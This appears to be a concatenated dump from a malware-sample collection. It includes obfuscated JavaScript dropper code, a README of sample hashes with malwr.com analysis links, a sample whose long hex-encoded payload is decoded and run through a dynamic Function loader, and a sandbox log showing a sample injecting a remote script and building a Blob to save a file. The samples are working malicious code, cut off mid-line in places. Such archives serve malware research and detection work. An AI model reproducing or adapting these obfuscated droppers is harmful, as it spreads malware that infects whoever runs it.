251 | } 252 | } 253 | function xAmTQIo(ADRc) { 254 | var cbax = true; 255 | var VZgcl = 44292; 256 | var wHe = false; 257 | if (wHe === "0") { 258 | var oTuAar = 72243; 259 | } 260 | switch ("0") { 261 | case true: 262 | var ejDhu = false; 263 | if (ejDhu == "0") { 264 | var tlsbNLL = false; 265 | } 266 | break; 267 | case true: 268 | var sfwXh = 53515; 269 | break; 270 | }; 271 | 272 | var mgWpAH = 70420; 273 | } 274 | try { 275 | pKAtnI(14279, false); 276 | gQGLMfk(false, "1"); 277 | if (fsRAZ("1", false, 11500, "0") != 1) { 278 | xAmTQIo("0"); 279 | } else { 280 | mODbP(); 281 | } 282 | ElMQW("1"); 283 | } catch (IyKtKZQ) {} -------------------------------------------------------------------------------- /malware/20161227/README.md: -------------------------------------------------------------------------------- 1 | 913edfa193769a34805c4b8fcdf8737bce7dc5326e6201217ce61bebc85135e6 2 | https://malwr.com/analysis/YTAxNTk3YzMwOGFkNDNlZTgzMmYzMzhkNWYwOGU2M2M/ 3 | 4 | 911bc50c3fcfbd0a1293f5de2b33001d588aa9df4b9a9542880cfca1eaba10cf 5 | https://malwr.com/analysis/YmQ5ZTc1MDJhOTM3NGJmNmJlY2U0NTcxYzdiZDcwMDk/ 6 | 7 | 06e9b62cfa79e8d6cbf2d650dd623c041822eff24e171867c0bf49a4b17d66b2 8 | https://malwr.com/analysis/YzYwZThhMjc2YjQ5NGIwNmI3NDRhZjg4OWExMzNlMGU/ 9 | 10 | ca0daa0a2305e3576e2c74c8ad98d115a90642e14377508afaee2096b58bb0ab 11 | https://malwr.com/analysis/MWZlY2EzNGZkYzEwNGFhMmJiZjRjZTFlMTFkMmM3NjM/ 12 | 13 | d0ee77a75a89b7a5ad7cc998526297208454de56f8a403d609d71c7f9ef10f80 14 | https://malwr.com/analysis/YTJkZGJiNTBkZjk1NDE2ZWFhNjAzOWY2YTkxZTM4NDM/ 15 | 16 | 2b2c85e2de6dbd4e1ff02d12018c871984387f6c428a1b515624a1a6b4c5ea00 17 | https://malwr.com/analysis/M2JhOTYwMTY3MGVmNGUzNjlkNWE4NWVkOGJhOTAwNWQ/ 18 | 19 | c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd 20 | https://malwr.com/analysis/MzY3Y2U1YWMwMjY0NDRjZDgyOTFiYzY3YTVhNjI0ZTE/ 21 | 22 | a35738f52720eb875932e65a3831611e6ba7447d40ab90476dff88833243d892 23 | 
https://malwr.com/analysis/YzMyMTg2NTFhMTRmNGE0MDk2ZDZhYzM0Y2MwZTI4ZDM/ 24 | 25 | 97d87081f0b8e890df0a1c8ae85332b673329d3f2a74f00f7be3b6cb8ce1fe2c 26 | https://malwr.com/analysis/YzQ5ZTY3ZDE0M2U5NDQzY2ExNTg5MDMyMDJkNDZiODY/ 27 | 28 | 18953b45756b4da58948cdc9dc3b4c5af333c4cadd6890bce5bc0fe1395ad63b 29 | https://malwr.com/analysis/OWJhNGZjOWFkMzcwNDZjMzkyZjFiNDIxZTUzNTkwYTA/ 30 | 31 | 01e4c87434e28a8838cfaf16b121e474512ca176efdcb0bba577fbbb2ddfc8c6 32 | https://malwr.com/analysis/MWVlNDNmMDliYTg4NDdkZjhhZmRkZTJmOTFjZWU3ZWU/ 33 | 34 | 961e7da15919c2d4744bbe161f1db0daa99127e9311c0cfa4c217b7ffa0f33fe 35 | https://malwr.com/analysis/NTMyMjI3OTllZTUwNDgyZWE2YzA2YmQ4YmRmZjFiODY/ 36 | 37 | b84e2ced6c7628264e75d2fc5615b3b4a23c18df494618da347d2eebc90ecd80 38 | https://malwr.com/analysis/NDc1MGFmM2NmM2JkNGFlODg5YTUxYzVmMzU1MDJmNTU/ 39 | 40 | 84d73512b431365e1650998199fa7673b6fbd290935fcb7a1fbf071359c1ab46 41 | https://malwr.com/analysis/ODFmMDY0ZWU1OWNjNGQyZmE2NTM2ZWY1OTI4YWE1ZDE/ 42 | 43 | 44 | -------------------------------------------------------------------------------- /malware/20161227/c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd.js: -------------------------------------------------------------------------------- 1 | function qqfak() 2 | { 3 | var bwfgg=new Array("}R%","g."+""+"f","h){","e(p","++;","].su","JKX","PTC"); 4 | return bwfgg[Math.floor(Math['rand'+new Array('om')[0]]()*bwfgg.length)]; 5 | } 6 | function otojo() 7 | { 8 | var nrxyx="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"+ 9 | "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"+ 10 | "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"+ 11 | "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"+ 12 | 
"ef865a8d63caf64ae074dd638dd02aa2e6ce3a6cff677ab064da87fabe72e2065f3078ca77ef557fb7631b5876e2774b4365ecd45cd974bb07ce9b61ce757eba78b117dd5674a4741c9070d7665cc379e2f39de738b866ad6165b9263c1768f106aa8367f1970a7563b6631bd677d2c62ec331a2a2ca8b31c4c7fa6474b1566f3b31a8150cad72f5e65d4b78d4d67b6574ec949ffd5ee2d73bd17bef974a6372e2765e0a39d4f33c9442f9172b5f63a5178e9f61e9d65c9378d747fa4d76fd23fd5057e1278e477df6a74e4342f4a68db362f6965a8c74e307cecf5ed0f73d837ba5874d3b72fff65c9a33f6138b682aa4067d3670dbe63c6831d6b65e1d7cfdc61d6557b1078b4e7df5474bf75fd7270dd87ca6d74f6d31f1b2cc0131fd133c154dbb94dde733ead31e5a3ac6131b365cad670e5e65e1c79e7d3fbb963f4970a237fe2875d9c7efde7caed39cd338cb43fa0065ec57ec9942aa065baa63d5478ce17fc1176b7d39cc922dd327bcf38d573fa5262d8b64b2173d0e62de165d5763cb339e6123a0d3de3231c4728cdd38b3e31ba93ab5931bfd33d593ff5f74e6969f6a74fbd33b4a2aa7d67a0970dcc63b1a31a0e65d747cc4061aff57fb078ded7db1574a2f41dbb70cfb65af679a8b31bee2cfef31fa077b4962a703fc8b56b1774a7665f8542a8b61fab74f8b72d3678b8970"+ 13 | "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"+ 14 | "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"+ 15 | "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"+ 16 | "eaa38efd2abbf6caa272fe870b0865dd272be279ac631df039fb574cb463bef63a297ebd963d3238ace31bef6abeb6cda06cb656cdb138fee2ad216cb5f6cfe138f1c2a"; 17 | var xhken; 18 | while(true){ 19 | try 20 | { 21 | xhken=kdorj(nrxyx); 22 | break; 23 | } 24 | catch(er) 25 | { 26 | var a = 1; 27 | } 28 | } 29 | return xhken; 30 | } 31 | function kdorj(hlgwz) 32 | { 33 | return (new Function("eaipe","pbllg","wblzm","var pbusw=eaipe.ma"+"tch(/\\S{5}/g),jatsj=\"\",msjdc=0;while(msjdc Preparing Sandbox environment. 
9 | 14 Feb 22:25:15 - => Executing: env/utils.js quitely 10 | 14 Feb 22:25:15 - => Executing: env/eval.js quitely 11 | 14 Feb 22:25:15 - => Executing: env/function.js quitely 12 | 14 Feb 22:25:15 - => Executing: env/wscript.js quitely 13 | 14 Feb 22:25:15 - => Executing: env/browser.js quitely 14 | 14 Feb 22:25:15 - => Executing: env/agents.js quitely 15 | 14 Feb 22:25:15 - => Executing: env/other.js quitely 16 | 14 Feb 22:25:15 - => Executing: env/console.js quitely 17 | 14 Feb 22:25:15 - ==> Executing malware file(s). ========================================= 18 | 14 Feb 22:25:15 - => Executing: malware/20170214/459867.js verbosely, reporting silent catches 19 | 14 Feb 22:25:15 - Saving: output/malware_20170214_459867.js 20 | 14 Feb 22:25:15 - Saving: output/tr_malware_20170214_459867.js 21 | 14 Feb 22:25:15 - WScript.scriptfullname = (string) 'malware/20170214/459867.js' 22 | 14 Feb 22:25:15 - WScript.arguments = (object) 'malware/20170214/459867.js,xyz' 23 | 14 Feb 22:25:15 - new Node[10]() 24 | 14 Feb 22:25:15 - new Element[10]
25 | 14 Feb 22:25:15 - Element[10]
.tagname = (string) 'div' 26 | 14 Feb 22:25:15 - new Style[11]() 27 | 14 Feb 22:25:15 - Element[10]
.style = (object) 'Style[11]' 28 | 14 Feb 22:25:15 - Element[10]
.class = (string) 'myvqiw' 29 | 14 Feb 22:25:15 - Element[10]
.innerhtml = (string) 'iloz' 30 | 14 Feb 22:25:15 - new Function(if(document.getElementsByClassName('myvqiw')[0].innerHTML == 'iloz') return true; else return false;) => Function[12] 31 | 14 Feb 22:25:15 - Calling Function[12]() on sandbox 32 | 14 Feb 22:25:15 - document[3].getElementsByClassName(myvqiw) 33 | 14 Feb 22:25:15 - Element[4].class.get() => (string) '' 34 | 14 Feb 22:25:15 - Element[6].class.get() => (string) '' 35 | 14 Feb 22:25:15 - Element[8].class.get() => (string) '' 36 | 14 Feb 22:25:15 - Element[10]
.class.get() => (string) 'myvqiw' 37 | 14 Feb 22:25:15 - document[3].getElementsByClassName(myvqiw) ... 1 found 38 | 14 Feb 22:25:15 - Element[10]
.innerhtml.get() => (string) 'iloz' 39 | 14 Feb 22:25:15 - Returning: 'true' 40 | 14 Feb 22:25:15 - new Function(var docer = document;var screlement = docer.createElement('script');screlement.type = 'text/javascript';screlement.src = 'https://s3-us-west-2.amazonaws.com/s.cdpn.io/14082/FileSaver.js';screlement.onload = function() {var blob = new Blob([window.ato ... (truncated)) => Function[13] 41 | 14 Feb 22:25:15 - Calling Function[13]() on sandbox 42 | 14 Feb 22:25:15 - document[3].createElement(script) 43 | 14 Feb 22:25:15 - new Node[14]() 44 | 14 Feb 22:25:15 - new Element[14]